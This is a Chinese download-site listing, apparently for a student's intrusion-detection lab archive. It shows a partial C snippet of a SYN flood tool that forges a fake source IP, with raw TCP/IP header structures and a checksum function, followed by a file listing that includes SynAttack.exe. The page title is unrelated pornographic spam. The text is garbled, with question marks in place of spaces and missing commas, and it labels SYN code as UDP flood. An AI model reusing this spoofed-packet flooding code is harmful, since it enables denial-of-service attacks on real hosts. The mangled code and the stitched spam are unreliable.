91av视频/亚洲h视频/操亚洲美女/外国一级黄色毛片 - 国产三级三级三级三级

  • 大小: 18.73MB
    文件類型: .zip
    金幣: 1
    下載: 0 次
    發布日期: 2023-07-13
  • 語言: 其他
  • 標簽: udp??flood??

資源簡介

編譯原理udp flood 攻擊實驗報告

資源截圖

代碼片段和文件信息

#include??
#include??
#include??
#include?
#include?
#include?

#pragma?comment(lib“ws2_32“)?
#pragma?comment(lib“wsock32“)?

#define?SEQ?0x28376839?
#define?FAKE_IP?“111.111.111.111“?//?假源地址IP

USHORT?checksum(USHORT?*buffer?int?size);?
int?flood();?

typedef?struct?tcphdr?
{?
????USHORT?th_sport;????????????????????????//?16位源端口
????USHORT?th_dport;????????????????????????//?16目的端口
????unsigned?int?th_seq;????????????????????//?32位序列號
????unsigned?int?th_ack;????????????????????//?32位確認號
????unsigned?char?th_lenres;????????????????//?4位首部長度/6位保留字
????unsigned?char?th_flag;??????????????????//?6位標志位
????USHORT?th_win;??????????????????????????//?16位窗口大小
????USHORT?th_sum;??????????????????????????//?16位校驗和
????USHORT?th_urp;??????????????????????????//?16位緊急數據偏移量
}TCP_HEADER;????????????????????????????????//?TCP頭部結構

typedef?struct?iphdr?
{?
????unsigned?char?h_verlen;????????????//?4位首部長度+4位IP版本號
????unsigned?char?tos;?????????????????//?8位服務類型TOS?
????unsigned?short?total_len;??????????//?16位總長度
????unsigned?short?ident;??????????????//?16位標識
????unsigned?short?frag_and_flags;?????//?3位標志位+13報片偏移
????unsigned?char?ttl;?????????????????//?8位生存時間
????unsigned?char?proto;???????????????//?8位協議
????unsigned?short?checksum;???????????//?16位IP首部校驗和
????unsigned?int?sourceIP;?????????????//?32位源IP地址
????unsigned?int?destIP;???????????????//?32位目的IP地址
}IP_HEADER;????????????????????????????//?IP頭部結構

///////////////////////////////////////////////////////////////////////////////////
//
//由于TCP首部中不包含源地址與目標地址等信息,為了保證TCP校驗的有
//效性,在進行TCP校驗和的計算時,需要增加一個TCP偽首部的校驗和。
//
///////////////////////////////////////////////////////////////////////////////////
struct?
{?
????unsigned?long?saddr;?????????????????//?源地址
????unsigned?long?daddr;?????????????????//?目的地址
????char?mbz;????????????????????????????//?置空
????char?ptcl;???????????????????????????//?協議類型
????unsigned?short?tcpl;?????????????????//?TCP長度
}PSD_HEADER;?

WSADATA?wsaData;?
SOCKET?sockMain?=?(SOCKET)?NULL;?
int?ErrorCode=0flag=trueTimeOut=2000FakeIpNetFakeIpHostdataSize=0SendSEQ=0;?
unsigned?short?activPort=40000;?
struct?sockaddr_in?sockAddr;?
TCP_HEADER?tcpheader;?
IP_HEADER?ipheader;?
char?sendBuf[128];?

////////////////////////////////////////////////////////////////////////////////////////////
//
//?IP校驗和的計算方法是:首先將IP首部的校驗和字段設為0(IP_HEADER.checksum=0)
//?然后計算整個IP首部(包括選項)的二進制反碼的和。
//
////////////////////////////////////////////////////////////////////////////////////////////
USHORT?checksum(USHORT?*buffer?int?size)?
{?
????unsigned?long?cksum=0;?
????while(size?>1)?{?
????????cksum+=*buffer++;?
????????size-=sizeof(USHORT);?
????}?
????if(size)?cksum+=*(UCHAR*)buffer;?
????cksum=(cksum?>>?16)+(cksum&0xffff);?
????cksum+=(cksum?>>16);?
????return?(USHORT)(~cksum);?
}?


int?main()?
{
????std::string?portStr?ipStr;
????std::cout<<“輸入IP地址:“<

?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????目錄???????????0??2013-05-18?17:26??潘俊100410527入侵檢測\
?????目錄???????????0??2013-05-18?17:26??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\
?????目錄???????????0??2013-05-18?17:26??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\
?????文件???????44274??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\CL.read.1.tlog
?????文件?????????338??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\CL.write.1.tlog
?????文件??????571904??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.exe
?????文件?????????406??2013-05-15?21:18??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.exe.embed.manifest
?????文件?????????472??2013-05-16?17:11??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.exe.embed.manifest.res
?????文件?????????381??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.exe.intermediate.manifest
?????文件?????1544912??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.ilk
?????文件??????????45??2013-05-18?15:13??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.lastbuildstate
?????文件?????????838??2013-05-18?15:13??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.log
?????文件??????350711??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack.obj
?????文件?????????214??2013-05-15?21:18??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\SynAttack_manifest.rc
?????文件????????1260??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\cl.command.1.tlog
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\link-cvtres.read.1.tlog
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\link-cvtres.write.1.tlog
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\link.2872-cvtres.read.1.tlog
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\link.2872-cvtres.write.1.tlog
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\link.2872.read.1.tlog
?????文件???????????2??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\link.2872.write.1.tlog
?????文件????????2610??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\link.command.1.tlog
?????文件????????6874??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\link.read.1.tlog
?????文件?????????910??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\link.write.1.tlog
?????文件?????????682??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\mt.command.1.tlog
?????文件?????????506??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\mt.read.1.tlog
?????文件?????????202??2013-05-18?14:58??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\mt.write.1.tlog
?????文件?????????870??2013-05-16?17:11??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\rc.command.1.tlog
?????文件?????????450??2013-05-16?17:11??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\rc.read.1.tlog
?????文件?????????362??2013-05-16?17:11??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\rc.write.1.tlog
?????文件??????814080??2013-05-17?22:20??潘俊100410527入侵檢測\SYN?FLOOD攻擊源代碼\Debug\vc100.idb
............此處省略19個文件信息

評論

共有 條評論